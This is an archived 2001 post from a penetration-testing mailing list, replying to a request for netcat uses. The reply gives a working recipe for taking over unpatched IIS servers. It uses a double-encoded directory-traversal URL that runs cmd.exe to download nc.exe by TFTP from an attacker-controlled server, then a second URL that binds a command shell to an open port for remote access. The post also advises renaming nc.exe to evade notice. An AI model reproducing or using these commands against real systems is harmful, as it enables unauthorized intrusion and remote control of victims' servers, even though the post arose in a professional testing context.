Re: Ideas on netcat

From: Assess (assessat_private)
Date: Mon Aug 27 2001 - 15:01:35 PDT

  • Next message: Penetration Testing: "Re: Ideas on netcat"

    This is a simple way to take over an  IIS web server without the unicode
    patch. It requires a firewall has TFTP outbound active and an inbound port
    available with nothing loaded on it. While several things must occur for
    this to work I have had it work twice out of ten assessments so the odds may
    still be good. You may want to rename nc.exe to something less obvious.
    
    Get Netcat from your tftp server
    
    http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system3
    2/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe
    
    Start netcat on port23 or any port that is open inbound, and unused, through
    the firewall. TCP port 53 works more often than not if DNS has been
    configured incorrectly.
    
    http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cm
    d.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe
    
    Telnet to the port on the target system. If it works you should have a c:\
    prompt.
    
    ----- Original Message -----
    From: "Vo0d0o" <voodoooat_private>
    To: <pen-testat_private>
    Sent: Friday, August 24, 2001 2:29 AM
    Subject: Ideas on netcat
    
    
    
    To all netcat gurus,
    
    I hav been experimentin on netcat for a few days and searchin almost
    everyday on netcat for some possible uses ,but in vain.
    
    As far as I know, no site is giving some other uses of netcat pertaining to
    pen-testing ...other than the usual *README* file which I find too basic.
    
    I would be grateful if anybody could throw some light on uses of netcat in
    pen-testing.
    
    Thanx in advance.
    
    Cheers,
    Kartik.
    
    
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    



    This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:50:18 PDT